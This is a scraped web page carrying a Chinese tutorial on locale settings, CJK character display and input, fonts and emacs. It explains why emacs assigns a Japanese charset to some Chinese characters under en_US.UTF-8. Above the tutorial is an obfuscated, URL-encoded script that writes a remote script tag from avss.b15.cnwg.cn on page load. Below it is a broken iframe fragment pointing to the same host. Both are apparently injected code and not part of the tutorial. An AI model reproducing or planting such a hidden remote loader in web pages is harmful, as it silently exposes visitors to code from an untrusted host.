HTML Tags and JavaScript tutorial
<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
locale,中文的显示和输入,字体和emacs
locale,中文的显示和输入,字体和emacs
Reversion:0.5 Date:2006/07/22
不使用中文的locale也是可以显示和输入中文的,因为从原理上说,对一个X应用程序,只要它能正确识别要显示文本的编码,然后找到相应的字体就能正确显示,而对中文的输入来说,在能正确显示的前提下,只要能知道来自输入法的文本的编码也能正确输入。那这是不是说中文的locale没有存在的价值呢?不是的,看一个例子:
在各个locale变量都是en_US.UTF-8的环境下打开emacs(我用的是emacs22),带上-q选项使不加载~/.emacs文件,在*scratch*里输入“学习”两个字(如果有乱码的话可以先尝试打开一个带中文的utf-8文件,然后再在*scratch*里输入,似乎是emacs22.0.50.1的bug),你会发现两个字的字体有较大差别,把光标移到“学“字上,用C-u C-x =查看字符信息,发现其charset是japanese jisx0208,font是-JIS-Fixed-...,再查看“习“字,charset是chinese-Gb2312,Font是-arphic-ar pl...,显然这里emacs把“学”字认为是一个日语charset里的字符,而把“习”字认为是一个中文charset里的字符,由于在缺省情况下emacs为两个charset使用了不用的字体,就使两个字看起来不大一致。
虽然可以在fontset里对这个japanese charset强制指定使用和中文charset相同的字体,比如simsun,但这究竟不是一个好办法,因为在一般情况下中文的字体都是没有包含全部日文的。不过这里为什么把这两个字认为是这两个charset,而不是utf-8?在en_US.UTF-8的环境下从输入法输出的字符应该是UTF-8才对。这就和字体有关了,由于字体本身的特点,一种字体通常只包括了一种语言的某个字符集里的字符,至多再加上ascii字符,比如simsun字体除了ascii字符外,只包括了gbk字符集里的字符,这样对于utf-8这样的多语言编码,就必须把它编码的各个字符归到各个字体使用的字符集才能使用这些字体,而在utf-8使用的unicode里,有一些字符是中日韩共用的,应该把他们归到哪种字符集呢?没有一个特定的使用环境似乎不好办,这里emacs在en_US下把“学“字归入了日文字符集,这对中文的使用者就是不合适的。所以你必须告诉emacs你的使用环境,这里中文locale就发挥作用了,设置LANG=zh_CN.UTF-8,或者你只希望中文的显示和输入正确而保持英文环境,也可以只设置LC_CTYPE=zh_CN.UTF-8。
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">